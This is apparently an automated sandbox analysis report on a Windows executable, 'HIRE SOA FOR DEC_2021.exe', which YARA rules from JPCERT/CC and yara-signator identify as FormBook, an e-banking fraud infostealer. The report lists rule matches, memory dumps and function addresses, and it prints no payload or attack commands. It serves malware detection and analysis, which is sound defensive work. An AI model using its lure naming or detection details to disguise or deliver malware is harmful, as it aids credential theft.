Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Code function: 1_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_00404F61

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: HIRE SOA FOR DEC_2021.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Code function: 1_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

1_2_00403225

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_0040604C	1_2_0040604C
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_00404772	1_2_00404772
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_1AC70A17	1_2_1AC70A17
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_0041B8D6	3_2_0041B8D6
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_0041D2C0	3_2_0041D2C0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_0041CC12	3_2_0041CC12
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00408C90	3_2_00408C90
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00402D87	3_2_00402D87
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_0041BE25	3_2_0041BE25
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B720A0	3_2_00B720A0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B5B090	3_2_00B5B090
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C128EC	3_2_00C128EC
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C120A8	3_2_00C120A8
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01002	3_2_00C01002
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C1E824	3_2_00C1E824
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B64120	3_2_00B64120
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B4F900	3_2_00B4F900
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C122AE	3_2_00C122AE
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BFFA2B	3_2_00BFFA2B
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7EBB0	3_2_00B7EBB0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C0DBD2	3_2_00C0DBD2
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C003DA	3_2_00C003DA
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C12B28	3_2_00C12B28
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6AB40	3_2_00B6AB40
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C0D466	3_2_00C0D466
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B5841F	3_2_00B5841F
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C125DD	3_2_00C125DD
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B72581	3_2_00B72581
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B5D5E0	3_2_00B5D5E0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B40D20	3_2_00B40D20
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C11D55	3_2_00C11D55
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C12D07	3_2_00C12D07
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C12EF7	3_2_00C12EF7
